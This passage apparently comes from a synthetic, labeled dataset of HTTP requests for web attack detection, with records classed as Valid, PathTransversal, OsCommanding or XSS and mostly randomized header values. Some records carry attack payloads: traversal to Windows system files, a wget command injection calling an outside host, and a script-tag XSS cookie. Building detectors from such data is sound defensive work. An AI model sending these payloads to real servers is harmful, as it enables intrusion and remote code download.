Last-Modified: Sat, 22 Dec 07 01:27:28 GMT
Host: 191.145.67.24:80
Connection: keep-alive
Accept: video/quicktime;q=0.0
Accept-Charset: x-mac-japanese;q=0.9, windows-1251;q=0.7, cp-932, euc-jp
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 163.113.91.254
Cookie: ej1d=zd4li;5Soarg9tQas=ce
Cookie2: $Version="1"
Date: Sat, 26 Jan 08 11:32:57 UTC
ETag: "2c5mEFoap_-R.rf"
Expect: csEol9sq
From: mhhvcrm@gtad.de
If-Modified-Since: Fri, 23 Mar 07 12:03:05 UTC
If-Unmodified-Since: Mon, 19 Apr 04 12:20:27 CET
If-Match: *
If-None-Match: "p_9tHC__0am74VM"
If-Range: "QdJBZ10q-ElXWVpP"
Max-Forwards: 49
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: adtt9 cssas=aamp
Authorization: Basic c3c5ZGFoaTE6ZXRobWFvZTU=
Range: 09-
Referer: /deyMtp3g/4seleaht.ace
TE: chunked;q=0.0,trailers
Trailer: Referer
User-Agent: wqe1wte/6.2.0
UA-CPU: x86
UA-Disp: 010,8436,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9654x290
Via: FTP/6.3 47.237.168.72
Transfer-Encoding: compress
Upgrade: y9rpd/0.5, rret/3.4, W2nt/0.3
Warning: 600 www.oeyQ.gif:6 "MqLrrRse4tmzoe" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 73155166220455300
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

UttSaSi07sra8e=usrta

End - Id: 32616
Start - Id: 45467
class: PathTransversal
GET /aFSkYI7wVoAk/dO2AJG2AMl9gc/rsofrgdCe/cmQAx@LRvvl-/cNlvr/r4M4luMWUhSBD/atDWplteetzdjf/Uharvarinpeda.htm?ttNp5sen=tstyle+%40hlstoe+&uplx=%5CWINDOWS%5Csystem.ini&rI=42257099&zshhsTacro=teea5cEsn1i0nmSito&dag0hvbmds=3589114869&system8LjlXC7=eavopeh&i3e=c&eslsr6rs=lnslxJettsedh%28&rakyynrw3in8n=46311&hpaiivetNeoa=ClnT&fy4lTioonrO=ewGMg9cIl-&snN=iecatmetashutdown&zQw=066 HTTP/1.1
Host: 26.124.69.123
Connection: close
Accept: audio/x-wav;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: identity, deflate;q=0.1
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 104.75.30.146
Cookie: hFfinsert=6513;8eedpe=68381;AbsgpLpe=wIp5whwWientstdingf;5sean4eum2o=06;n9WdOHRr8=40775
Cookie2: $Version="526"
Date: Mon, 11 Jan 10 12:21:12 GMT
ETag: "MWQpBPOD6G9PQ6YY5D"
Expect: 100-continue
From: 9lho@aiRe.net
If-Modified-Since: Tue, 16 Sep 08 10:32:29 CET
If-Unmodified-Since: Sat, 24 Jul 04 11:58:39 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Nov 09 22:18:21 GMT
Max-Forwards: 408
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ohi4
Authorization: ianw cFnsazM=HpFt
Range: -23,7962-,63876-540949
Referer: http://www.nt7cAt.be/jpSa.dll
TE: deflate,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: u8XcDd http://www.tH5gw.biz
UA-CPU: x86
UA-Disp: 8084,8855,16
UA-OS: Win98
UA-Color: color8
Via: FTP/6.1 50.246.134.210, 8.0 80.80.231.46:6, 4.9 172.134.189.2:0
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 016 www.lea2ce.html "yMifIhorneae" 
X-Forwarded-For: 222.99.35.41
X-Serial-Number: 49844
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45467
Start - Id: 12339
class: Valid
GET /atlGiqnejri/iruOf7setyooGam/xVeTf.mspx?fbt34e=Rp+%3Fql%40i1rcpf%2Fr&ifmnhdnodaaehmL=puc%7C7echoiexhppsii%3E&httpalV9C=cA0%3B0bhttpsslrr%3Dele%29ICo&DI=teD3fHPDS HTTP/1.0
Host: 0.150.248.253:703
Connection: close
Accept: text/*;q=0.9, application/*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 26.201.194.45
Cookie: mlLlhXriWauarne=leCw3
Cookie2: $Version="16"
Date: Mon, 04 May 09 18:57:47 GMT
ETag: W/"HRo_O6CCOGzRZ7ilvJ6"
Expect: 100-continue
From: mehes@rstuth.com
If-Modified-Since: Fri, 19 Aug 05 11:57:15 UTC
If-Unmodified-Since: Thu, 17 Sep 09 04:16:36 CET
If-Match: "vkeY@Jt8R_iPJOv"
If-None-Match: "LBECKqPi@DksaUP5"
If-Range: Sun, 27 Sep 09 24:08:57 CET
Max-Forwards: 7994
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic aW5uZWtjaTpibnN0dTU=
Authorization: Basic amlzdG9wOmlpdGk=
Range: 662-4,8147-,483669-546
Referer: http://9bwMB.uk/seSovwsi/Nqih1.pl
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.1 (Machintosh; U; Mac OS X 7.7; ee-ni; rv:7.5.7) Gecko/44874603
UA-CPU: Sparc
UA-Disp: 1376,5433,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8258x863
Via: eMz/5.7 195.199.159.127:3520
Transfer-Encoding: loec; 12Ihc=iiiEdtw
Upgrade: got9/5.0
Warning: 258 141.130.237.37 "ioreaseroE" "Tue, 27 Sep 05 18:21:28 UTC"
X-Forwarded-For: 202.158.102.83
X-Serial-Number: 7559329085977019735
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12339
Start - Id: 20782
class: Valid
GET /tpxnf80trbLe/yrqmmurAanaiuo4n0wh/9SvbscriptxvS1UNQipa/ci.s-vPEEuz/4D7cc2duemasJ/qrepdera0onygtVf0arp/7Tn5meeakcahyoe.gif?d-xOUl0WwSupdatemail=6023&5ljLdeCJ8G4=noSsen&tenmb=cxlBD1&va=ftr&PdropEgroup by1lBBL=me&rV5f0RxINs=17&er6lyi=%2Bc%7Eses%40nci3sc++k&aeit1eHiiaDegdE=68053&vbmbtneS=741&mee5sra=43&ohfsyt1jseseoi=oe&81qo2esrl6hw=28&nanaintto=nnshne&vz2soDwp47iyei=baadH HTTP/1.0
Host: 249.114.9.185
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ezMl-lqahh;q=0.8
Cache-Control: no-cache
Client-ip: 145.106.245.168
Cookie: .Y@pfkpdGrcp=ehWZpj
Cookie2: $Version="61"
Date: Sun, 10 Aug 08 01:20:20 UTC
ETag: W/"L3YjBHgs1M8e2DeRG"
Expect: Reeyl
From: txeT@aevntoegn.com
If-Modified-Since: Wed, 23 Nov 05 11:26:36 GMT
If-Unmodified-Since: Mon, 30 Oct 06 09:05:49 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 13 Nov 06 06:19:08 UTC
Max-Forwards: 2
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic YUQ4cXlvczpvYWVhU3dJZQ==
Authorization: Basic YWJuTG5sYTpzdG1TdG5N
Range: 68-16
Referer: http://www.e6iotsi.ch/wxiaslLt/eHSeci/eonkl.conf
TE: trailers
Trailer: Referer
User-Agent: rr@8i0lW http://www.9xssbsi.uk
UA-CPU: Sparc
UA-Disp: 369,7940,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2009x4676
Via: dt5S/8.8 165.246.220.101
Transfer-Encoding: gzip
Upgrade: ichhc/3.2
Warning: 871 www.ryuuaerc.shtml "ayteeudhmseta" "Sun, 11 Oct 09 20:53:16 CET"
X-Forwarded-For: 174.119.33.87
X-Serial-Number: 39917227024822129
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 20782
Start - Id: 43483
class: OsCommanding
GET /245iHVcoTfRB/yYdaB/D_xGgetc/YnCZwGklog4s/rTbLO1EtLCWbkzxrM6jg/akxh9RN3Y_g4d2Df/girrrtneHK/iefuezbewe7/hwt3an/jisaelazejprerehfrnA/sevdgeznatzha7xyt0e/documentGXKMU7C.exe?ehnoruf5iwrra3=%22++%3B++%2Fusr%2Fbin%2Fwget++++www.onesisro.com%2Ferilolst+++++%3B HTTP/1.1
Host: www.eeumee.be
Connection: 9oPtlqoi
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: identity
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 255.41.98.184
Cookie: tehcortl68gltm=ewkuier;nuouplCneynnet= en-iy2kuehS;reesadoav1oozae=rodqeeilcnreeetyr;nnndmeEa8ihern=dOx;reh=aiesroaEgimeprse
Cookie2: $Version="51"
Date: Fri, 01 Sep 06 11:49:04 GMT
ETag: W/"@K4eB7R86idDJqDsd"
Expect: 100-continue
From: 0rhyil@a9lhonata.it
If-Modified-Since: Fri, 18 Jan 08 06:42:10 CET
If-Unmodified-Since: Tue, 20 Apr 10 11:57:52 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 24 Jan 06 04:20:09 CET
Max-Forwards: 7468
MIME-Version: 0.6
Pragma: h='de'
Proxy-Authorization: Basic dHR3SVJyaWU6ZHJhdGVtOA==
Authorization: snnone tsht4=D3doear
Range: 4-
Referer: /syeaatt.php
TE: gzip,trailers,chunked;q=0.9
Trailer: Range
User-Agent: Mozilla/3.6 (X11; U; SunOS sun4u 4.1; 6z-ed; rv:6.0.0) Gecko/15483689
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2941x889
Via: 7.9 www.3fdsttd.png
Transfer-Encoding: deflate
Upgrade: fnnrrl/9.4, febrea/6.3, qsal/0.4, T0ng5e/2.6
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 43483
Start - Id: 26630
class: Valid
GET /2Mcc1CrQldropdxw/iAD9EKErM@/t0etNdsah9os4tgnn7tr/mcutsc/dxaccess_log6ynxNf2vconnectu.png? HTTP/1.0
Host: 90.126.41.152
Connection: close
Accept: text/*;q=0.5, text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: d3nq-Ih, d-t, obwecPo-eaead
Cache-Control: min-fresh=40443
Client-ip: 147.16.61.41
Cookie: tll=lil+o;qe5ldl=Etncdsoysvo8mta
Cookie2: $Version="9"
Date: Wed, 07 Jan 09 12:44:30 GMT
ETag: W/"xK2KPSsK0S8p@T34H"
Expect: 100-continue
From: ceebh8z@anOtt1nhog.cz
If-Modified-Since: Wed, 11 Jul 07 15:19:38 GMT
If-Unmodified-Since: Mon, 08 Sep 08 15:18:47 GMT
If-Match: "vgH_H6At8Xix..HU"
If-None-Match: *
If-Range: "JOfE5Ba97rF1ydNVz6P8"
Max-Forwards: 436
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest username="Ernotl4"
Authorization: hmtyd t0spe=gdEs
Range: 442029-,4-
Referer: http://cluEenhe.biz/liitdd/sosIxchn/ao1nsu/ll81x.tar.gz
TE: gzip;q=0.7,gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: sa0h/2.9.0
UA-CPU: Sparc
UA-Disp: 080,9861,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 190x433
Via: 4.5 www.aufnri.jpg
Transfer-Encoding: aknaw; saehw=ssccn8Ih
Upgrade: iqeeh/8.0, lpstrb/3.7, 0ddrat/0.4, ieq/2.7, n5pdk/3.6
Warning: 556 www.nSecserr.shtml "kaqb8" "Fri, 10 Aug 07 08:19:22 CET"
X-Forwarded-For: 98.254.54.114
X-Serial-Number: 21651458708939157204
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 26630
Start - Id: 1839
class: Valid
GET /ffae5oephliamlden/aeeZdedopsorcpE8pAe/gadaeueo1yoJdrf/iJyYshAFbUIlX/utm/rj.ANQ5n.NPvB3jht/tsl5asehwdcesnelhsAa.gif? HTTP/1.0
Host: 95.170.222.171:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: macintosh
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 76.195.99.9
Cookie: Rlelax5MH2X9=HeTitausre ;U7from7Eformp00dI.G=lkjZUtp1qYXe
Cookie2: $Version="853"
Date: Sat, 06 Mar 10 15:18:09 CET
ETag: "Ax-jm_fdfddxcb-a"
Expect: 100-continue
From: iowp@kekstehsto.de
If-Modified-Since: Thu, 21 Sep 06 20:32:45 UTC
If-Unmodified-Since: Wed, 04 Mar 09 12:54:56 GMT
If-Match: *
If-None-Match: *
If-Range: "ELetv.6ji4nWiFP"
Max-Forwards: 7
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: NTLM aWl3ZnJhanRub2xndG1raDBFUmVpdXI1aWVobmFUYWl6dA==
Range: -34624,61390-055,75119-
Referer: http://Neatkl.cz/gwq2ftf/uSleuDtn/gf5n/eNnlrsro/nhear.php4
TE: gzip;q=0.9,trailers,trailers
Trailer: From
User-Agent: tjIM_DD. http://www.artLeet.be
UA-CPU: x86
UA-Disp: 131,0628,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 286x332
Via: 2.8 5.105.8.49:4906, FTP/3.1 190.242.19.240
Transfer-Encoding: deflate
Upgrade: pxiaC3/3.8, ite/3.5
Warning: 873 46.18.235.86 "8c9ecuoaiakTp" "Wed, 28 Sep 05 10:11:08 CET"
X-Forwarded-For: 22.125.3.165
X-Serial-Number: 732644687
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1839
Start - Id: 46722
class: XSS
GET /iDpy/72W/u2G-N2-DCN@c/h_nCUREO6h7K/i9g4N@WGshhEbt0vDenQ/ttsa/r4fetciDie5ygtu/m_Kwa@rmIY/wEsnlyoLyndiebti/jSL72h.l0xxu0SxzbIsH/ur3sen0q.mdb?femne=bw&aaIhnc0aes=Ess&6syitte=804427&mtukxeto8=9n%24d+i&ie=k4child&0xeho=saeBed&bseoo=%25i8sleol%3D9oaer&hr7=dcte1p&Ni=tbhciefreplaceriie%2Bai7&Nti=i%5CTimdrtfuin HTTP/1.1
Host: 35.15.223.130:14641
Connection: keep-alive
Accept: text/html
Accept-Charset: x-mac-korean, cp-932;q=0.3, x-mac-japanese;q=0.8
Accept-Encoding: compress;q=0.0, deflate, compress, deflate, compress;q=0.8
Accept-Language: mn7nn-gdRah, blr-f;q=0.6, aaseeQse-y;q=0.3, osmBEN-te, 8hmile2-ihnranZt
Cache-Control: max-stale=95331
Client-ip: 214.94.242.132
Cookie: aey9pqbhbul=Cddropepd<tmp:uu>aal;xcO.Anetcati4=126367696;documentwj_@xchildceH=4s.a;V35xkdrop.AOl=re3S-;ceki0nwu9dck=<script    >alert (etaosSsnen3.qbh5i)</script   >;iLwgotvHoeeza=01937692
Cookie2: $Version="3"
Date: Wed, 14 Dec 05 23:17:37 GMT
ETag: "qie2CWbTsN2waC6"
Expect: rrsttus
From: tlpU2@Ewhhaeft0.org
If-Modified-Since: Wed, 24 Sep 08 09:20:11 GMT
If-Unmodified-Since: Tue, 19 Feb 08 12:10:54 UTC
If-Match: "d76K5hd@BUlwvz6o78"
If-None-Match: *
If-Range: Mon, 07 Sep 09 15:48:34 GMT
Max-Forwards: 977
MIME-Version: 2.0
Pragma: u='hnh'
Proxy-Authorization: Digest response="9ABaE16759aadC15B9aD1DfddD0fd7b3"
Authorization: Basic ZXJsZTphdjB0M2F5bw==
Range: -4,-90,-87939
Referer: /Nxeo.fgf
TE: chunked,trailers
Trailer: TE
User-Agent: HceTrslti (eqbj3nutQJ; 6wIpE_p5B; dEp61J.XZ1; iH6e0lM; u81BZinSj)
UA-Disp: 386,623,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9878x3809
Via: FTP/8.9 www.imAuLari.html, HTTP/7.9 www.3aym.js, 9.8 164.122.229.159
Transfer-Encoding: deflate
Upgrade: cips/9.2, sovfy/0.4, Tuweh/3.9, dzd/8.5, do6/5.7
Warning: 791 www.iyhfNt.shtml:6970 "Ses9wrahboraa" "Sun, 03 Jan 10 05:50:14 GMT"
X-Forwarded-For: 166.176.57.0
X-Serial-Number: 673564255983
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46722
Start - Id: 8212
class: Valid
GET /u1z4..bin?ieadtwtszfd=9901&-EIimg=sY.U&pttnS4whEkeG=41737&wtonesHe=18&Dtu=08310780&mlhtoO7eRmner=iframe-%3Ao&dnesTbvHlt=dhtelusWs9eEz&eoi9e5tNireRaC=snhiD&14o=23 HTTP/1.0
Host: www.apuDgneeie.com
Connection: dtaeh
Accept: application/zip, application/rtf, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=14774
Client-ip: 168.87.56.109
Cookie: ttfoshlteqeufa=-httpso~b
Cookie2: $Version="296"
Date: Fri, 19 Mar 10 17:07:35 CET
ETag: W/"6Yal4L@TVxr.WUoqs"
Expect: gPoHorv
From: naraez2@nbaeit.cz
If-Modified-Since: Tue, 25 Sep 07 21:17:46 UTC
If-Unmodified-Since: Mon, 10 Jul 06 21:49:49 UTC
If-Match: "VLMl@ciUW0dWFCfr"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 1.5
Pragma: tic4=ohemulw
Proxy-Authorization: Basic ZFJnckVlYzpvc2tl
Authorization: Basic b2V6d2l0c3Q6aXhpYXNr
Range: -35,4-,306-
Referer: http://t7Shtnra.gov/QUhah/7wms/kSstf/mOti.mpg
TE: trailers,trailers,trailers
Trailer: From
User-Agent: ixoaiaiubftaccaa
UA-CPU: x86
UA-Disp: 260,910,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1852x378
Via: 3.0 www.hheveP.jpg:76
Transfer-Encoding: i8an
Upgrade: tjth/0.9, hh0ah/8.9, EwEr/4.3, 8oho/7.6, ofue/1.5
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 11.176.40.26
X-Serial-Number: 24287
----: --------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8212
Start - Id: 17572
class: Valid
GET /bAQ5l.jpeg? HTTP/1.1
Host: 236.167.162.62
Connection: keep-alive
Accept: video/mpeg;q=0.6, video/*;q=0.6, image/jpeg
Accept-Charset: windows-1253, x-mac-chinesesimp;q=0.6, cp-950, x-mac-arabic
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 49.58.142.8
Cookie: nahnMe8a=47473;ho0Nt1=pUJAACg;fbyjtaMsa=884;cNhSevce=ofazo0imtl;hbmtoeutSalm=5196489;Enblu4eu9had=4vayouXtentrgsw
Cookie2: $Version="383"
Date: Sun, 26 Aug 07 13:32:29 GMT
ETag: "yFsCQA0qcZwD8_Euq"
Expect: 100-continue
From: toHtw@a9mti.it
If-Modified-Since: Thu, 29 Jan 04 09:58:00 GMT
If-Unmodified-Since: Mon, 30 Oct 06 16:29:13 CET
If-Match: "pw7w_P_9hGXVhrePEH2"
If-None-Match: *
If-Range: *
Max-Forwards: 5642
MIME-Version: 3.0
Pragma: 5Vdawv=Nhmt
Proxy-Authorization: Ne0eoc jlottGkn=mmT0iei
Authorization: Basic c3Rsbzg6aGVlNWhCaHo=
Range: 22389-71,-169,-0
Referer: http://www.e00rEnxd.org/a7iro/s6tonip/7antndd/eDa6/btgetdPe.pl
TE: gzip;q=0.0,chunked;q=0.5,trailers
Trailer: From
User-Agent: Mozilla/5.5 (X11; U; Open BSD i386 5.1; 5i-gn; rv:0.5.4) Gecko/50689017
UA-CPU: x86
UA-Disp: 1857,5660,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 519x8664
Via: 0.8 www.ouK58q5m.jpeg, 4.8 228.99.192.87
Transfer-Encoding: deflate
Upgrade: httos/8.2, cIe/0.7
Warning: 445 www.rtwliIsn.jpg:095 "mtrmdgaq" 
X-Forwarded-For: 203.39.140.226
X-Serial-Number: 2432854713
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17572
Start - Id: 9046
class: Valid
GET /1S/16systemlinkn.RWrJdWhttpT/XshutdownS/tcuN6@hJA3KXZ/rhtUOue6eMwerm3r/alg-6up3r.mdb? HTTP/1.0
Host: www.a5rgenlheg.cz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: us-ascii;q=0.3
Accept-Encoding: deflate;q=0.7
Accept-Language: cpadere-cear
Cache-Control: sCet=scnistoa
Client-ip: 168.206.47.117
Cookie: thlaebshxqer=266402664;nksehce=dm02DzLX7N;fzdal=tcikeaEhoiiesE;mi=qgYoe;YZMIxp_MHXhN=80;metawwgettSz3JtconnectV1=ye/elr6a6
Cookie2: $Version="2"
Date: Thu, 27 Jan 05 03:53:12 GMT
ETag: W/"30kbexde-MHlHHe-2@3"
Expect: rua8eTaD=haolmyh;ktaNk
From: 48c280@SmrnD71.net
If-Modified-Since: Sun, 14 Aug 05 20:22:40 CET
If-Unmodified-Since: Fri, 13 Jun 08 13:24:10 CET
If-Match: "Qoh_B8A.eXb8vlJu6xC5"
If-None-Match: *
If-Range: Wed, 31 Dec 08 04:07:45 GMT
Max-Forwards: 900
MIME-Version: 2.2
Pragma: aH=beeeot
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: Digest nonce
Range: -9,-8753
Referer: /gnnakani/soEsnogi.js
TE: trailers,trailers,chunked
Trailer: TE
User-Agent: embloyhRtu/7.2.0
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 117x032
Via: i64cr/3.3 253.228.74.132, 0.6 171.41.157.140
Transfer-Encoding: sej6x; elhr=oPntiN
Upgrade: hrimd/4.4
Warning: 283 116.154.53.88 "5oiE4hneih" "Sat, 27 Jan 07 01:20:17 UTC"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 278976284
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9046
Start - Id: 3601
class: Valid
GET /ucRP8_Zq3NRNr8/4wexecxDF9servicesSr/Elpne/nZ7PselectglqL.jpeg?bhDMnviwHs=ahuZ&tO3hievrf8agO=462 HTTP/1.1
Host: 20.191.14.108:044
Connection: cter3ef
Accept: video/mpeg;q=0.0, video/mpeg
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: ufskeMU='ct'
Client-ip: 255.9.125.9
Cookie: o0sho=St7tbxgVxnodepmeeo9;uteoT9=0;gGtLtgfolrkaegu=tUMN;4eg=unetcat;uet=dT5
Cookie2: $Version="8"
Date: Sat, 29 Dec 07 02:35:25 GMT
ETag: W/"-nf2lvC2chfFdKVoeX"
Expect: sMwaah
From: izCq@ns1arneDin.cz
If-Modified-Since: Tue, 24 Feb 09 02:15:55 GMT
If-Unmodified-Since: Tue, 06 Mar 07 10:28:23 UTC
If-Match: "ya.0T@ED-nN1oD0"
If-None-Match: "5jJ6ldsD5@xZ5Cpl"
If-Range: Fri, 22 Sep 06 03:46:37 CET
Max-Forwards: 55
MIME-Version: 6.3
Pragma: iw='asr'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM bzlkYW5zYmVhbnluczRmZXplYW1ldGllc0lzbHh5bGhlaG90QWFidA==
Range: -276748,6-3375
Referer: http://e4raoear.gov/39bahlsd/zmbaevt.zip
TE: gzip,trailers
Trailer: If-Range
User-Agent: taenajnd
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1552x648
Via: HTTP/4.6 122.199.239.246:44290, 9.5 218.4.147.1
Transfer-Encoding: compress
Upgrade: aHnnn/4.7, e0Tge/7.4
Warning: 224 www.tEikUeR.htm:6 "oMd1sh7i" 
X-Forwarded-For: 35.71.57.22
X-Serial-Number: 41732
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3601
Start - Id: 45768
class: PathTransversal
GET /olzseiDrnoeor/4EJ/rll/A7tpositionB8BxgC6Eu8N/70gE@sZCBpSdeI/2p@nJpdCIuxR/dAGyt/rGD2MxXU@/2YJgDwP8FgaCQbD.asp?WMT9execBfrom=n%3A%5Cwindows%5Cboot.ini&eS0cioleyes8l=9csk-CJ210&3A=eC%40Pci&a87=nNrfa8hHSe HTTP/1.0
Host: 208.188.46.156:1038
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: tgou-aeoDo;q=0.2, afennbp-awrlecr;q=0.2, t-s15ctla
Cache-Control: min-fresh=142
Client-ip: 20.215.35.161
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="51"
Date: Sat, 09 Oct 04 06:23:08 GMT
ETag: W/"ZuCaxTopQAS6sIGZ4"
Expect: 100-continue
From: dsxeHs@whobloehb.be
If-Modified-Since: Mon, 29 Aug 05 14:04:01 UTC
If-Unmodified-Since: Wed, 23 Feb 05 03:01:45 GMT
If-Match: *
If-None-Match: *
If-Range: "9ARq7ETJZu3GDsc"
Max-Forwards: 308
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: nE0np rioae=tsisa
Authorization: Ores eEtpwyE4=Eninloeo
Range: -500252,934-3694
Referer: http://6thiet.net/tauno0/rwagsnch.swf
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.2 (compatible; sFnny4; Solaris; npyiiii; iHthor1eo)
UA-CPU: 68000
UA-Disp: 517,832,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: HTTP/7.5 32.50.150.25:911
Transfer-Encoding: gzip
Upgrade: pvn3h/3.4, legdk6/8.9, d1wenn/6.0
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 217.11.93.180
X-Serial-Number: 5959177395
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45768
Start - Id: 9628
class: Valid
GET /nxwi3rvdfrebsiuT/ecyKXQs1H/arroFo/oTIgdiilpmddmc/cjvrOzgyE/inzFxYIM8TVL/bel2heHoCit/uiqshutdownjgroup byV/_zjC/eo/u2zkV-2al_2IYy/tchir5qlmtrs.htm?rndEl4lkee3Tcn1=tou&rnss7imeyhd=5&GY7VTT=uiahnsnoia&H5includeeCetcZ1DBB=ngcOiire7e&cp=0717&3lgay8aveey=hvP&mhnndodaopl=t&tmeefa=vlrs&imTB=7tct HTTP/1.0
Host: 112.155.69.246
Connection: close
Accept: image/*;q=0.6
Accept-Charset: macintosh;q=0.2, x-mac-chinesetrad;q=0.3, shift_jis;q=0.0, x-mac-cyrillic;q=0.4, iso-8859-7;q=0.9
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: min-fresh=01446
Client-ip: 192.221.57.112
Cookie: adminGoGprocessing-instruction=delete)s;t);See=931742922;a2aQxqdaaake=ee&Oddeletenrh;eh=44005479;Fk2inlIfqOXOO=dinutealink
Cookie2: $Version="3"
Date: Wed, 16 Nov 05 16:04:11 GMT
ETag: "wC5C@@3slKE6fF2HXx"
Expect: 100-continue
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Sun, 30 Sep 07 21:10:57 GMT
If-Unmodified-Since: Sun, 22 Oct 06 23:28:06 CET
If-Match: "1X5TB5uSDrxZrSvu"
If-None-Match: *
If-Range: "m.sQzXrnIgcLZC@Fhl"
Max-Forwards: 45
MIME-Version: 3.3
Pragma: s='cic7oiJN'
Proxy-Authorization: Basic ZXkzM2Nydjo0ZHUyd2k=
Authorization: ncsnt rA5h6=n8ltbF
Range: -11893
Referer: /5eemC.wmn
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.6 (X11; U; Open BSD i586 0.7; iQ-qn; rv:9.9.8) Gecko/72851951
UA-CPU: Sparc
UA-Disp: 8659,744,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9491x5662
Via: 7.4 www.ayoej.css
Transfer-Encoding: compress
Upgrade: sNh/6.5, ssodh/7.1, jrin/2.9, wHoee/3.7, reoo9/6.9
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 34.115.88.196
X-Serial-Number: 04486
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9628
Start - Id: 28388
class: Valid
GET /e3tnceeeogjheegsB/tbmrR0sGR9qeRPLrB/aV8fq6OdDivTKdyLGW3l/lNnnbdO2egoEejste/hbh2Ksgnnh/h7t/egcttchoR/FIctiadvheoxzyoibvc.nsf?ekTgoe3aJauhfa=9778 HTTP/1.0
Host: www.naart.gov
Connection: hnsdWa
Accept: */*;q=0.1
